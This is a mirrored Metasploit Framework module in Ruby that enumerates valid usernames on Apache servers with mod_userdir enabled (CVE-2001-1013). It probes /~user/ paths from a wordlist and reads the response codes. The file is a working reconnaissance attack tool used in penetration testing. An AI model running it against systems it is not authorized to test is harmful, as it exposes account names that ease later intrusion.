Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/apache_userdir_enum.rb
19637 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Scanner

10
  include Msf::Auxiliary::AuthBrute

11


12
  def initialize

13
    super(

14
      'Name' => 'Apache "mod_userdir" User Enumeration',

15
      'Description' => %q{Apache with the UserDir directive enabled generates different error

16
      codes when a username exists and there is no public_html directory and when the username

17
      does not exist, which could allow remote attackers to determine valid usernames on the

18
      server.},

19
      'Author' => [

20
        'Heyder Andrade <heyder.andrade[at]alligatorteam.org>',

21
      ],

22
      'References' => [

23
        ['BID', '3335'],

24
        ['CVE', '2001-1013'],

25
        ['OSVDB', '637'],

26
      ],

27
      'License' => MSF_LICENSE

28
    )

29


30
    register_options(

31
      [

32
        OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),

33
        OptPath.new('USER_FILE', [

34
          true, "File containing users, one per line",

35
          File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt")

36
        ]),

37
      ]

38
    )

39


40
    deregister_options(

41
      'PASSWORD',

42
      'PASS_FILE',

43
      'USERPASS_FILE',

44
      'STOP_ON_SUCCESS',

45
      'BLANK_PASSWORDS',

46
      'USER_AS_PASS'

47
    )

48
  end

49


50
  def run_host(ip)

51
    @users_found = {}

52


53
    each_user_pass { |user, pass|

54
      do_login(user)

55
    }

56


57
    if (@users_found.empty?)

58
      print_status("#{full_uri} - No users found.")

59
    else

60
      print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")

61
      report_note(

62
        :host => rhost,

63
        :port => rport,

64
        :proto => 'tcp',

65
        :sname => (ssl ? 'https' : 'http'),

66
        :type => 'users',

67
        :data => { :users => @users_found.keys.join(", ") }

68
      )

69
    end

70
  end

71


72
  def do_login(user)

73
    vprint_status("#{full_uri}~#{user} - Trying UserDir: '#{user}'")

74
    uri = normalize_uri(target_uri.path)

75
    payload = "#{uri}~#{user}/"

76
    begin

77
      res = send_request_cgi!(

78
        {

79
          'method' => 'GET',

80
          'uri' => payload,

81
          'ctype' => 'text/plain'

82
        }, 20

83
      )

84


85
      return unless res

86


87
      if ((res.code == 403) or (res.code == 200))

88
        print_good("#{full_uri} - Apache UserDir: '#{user}' found ")

89
        @users_found[user] = :reported

90
      else

91
        vprint_status("#{full_uri} - Apache UserDir: '#{user}' not found ")

92
      end

93
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

94
    rescue ::Timeout::Error, ::Errno::EPIPE

95
    end

96
  end

97
end

98


99